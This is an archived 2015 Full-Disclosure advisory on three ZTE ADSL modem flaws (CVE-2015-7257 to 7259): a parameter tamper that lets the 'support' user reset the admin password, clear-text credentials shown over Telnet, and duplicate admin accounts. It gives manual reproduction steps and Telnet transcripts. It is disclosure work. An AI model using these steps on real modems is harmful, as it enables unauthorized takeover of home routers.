lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAB8+WF1--_qqwD-wpYn9AVV2mDci7t46o4jLqRgndSqzhOjabg@mail.gmail.com>
Date: Tue, 10 Nov 2015 19:12:53 +0000
From: Karn Ganeshen <karnganeshen@...il.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] ZTE ADSL modems - Multiple vulnerabilities

*ZTE ADSL modems - Multiple vulnerabilities*

Confirmed on 2 (of multiple) software versions - *W300V2.1.0f_ER7_PE_O57
and W300V2.1.0h_ER7_PE_O57*

1 *Insufficient authorization controls*

*CVE-ID*: CVE-2015-7257

Observed in Password Change functionality. Other functions may be
vulnerable as well.

*Expected behavior:*

Only administrative 'admin' user should be able to change password for all
the device users. 'support' is a diagnostic user with restricted
privileges. It can change only its own password.

*Vulnerability:*

Any non-admin user can change 'admin' password.


*Steps to reproduce:*

a. Login as user 'support' password XXX

b. Access Password Change page - http://<IP>/password.htm

c. Submit request

d. Intercept and Tamper the parameter ­ username ­ change from 'support' to
'admin'

e. Enter the new password ­> old password is not requested ­> Submit

­> Login as admin

-> Pwn!



2 *Sensitive information disclosure - clear-text passwords*

Displaying user information over Telnet connection, shows all valid users
and their passwords in clear­-text.

*CVE-ID*: CVE-2015-7258

*Steps to reproduce:*

$ telnet <IP>

Trying <IP>...

Connected to <IP>.

Escape character is '^]'.

User Access Verification

Username: admin

Password: <­­­ admin/XXX1

$sh

ADSL#login show                 <--­­­ shows user information

Username Password Priority

admin        password1 2

support      password2 0

admin         password3 1



3 *(Potential) Backdoor account feature - **insecure account management*

Same login account can exist on the device, multiple times, each with
different priority#. It is possible to log in to device with either of the
username/password combination.

*CVE-ID*: CVE-2015-7259

It is considered as a (redundant) login support *feature*.


*Steps to reproduce:*

$ telnet <IP>

Trying <IP>...

Connected to <IP>.

Escape character is '^]'.

User Access Verification

User Access Verification

Username: admin

Password: <­--­­ admin/password3

$sh

ADSL#login show

Username  Password  Priority

admin  password1  2

support  password2  0

admin  password3  1

+++++

Best Regards,

Karn Ganeshen
-- 
Best Regards,
Karn Ganeshen

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ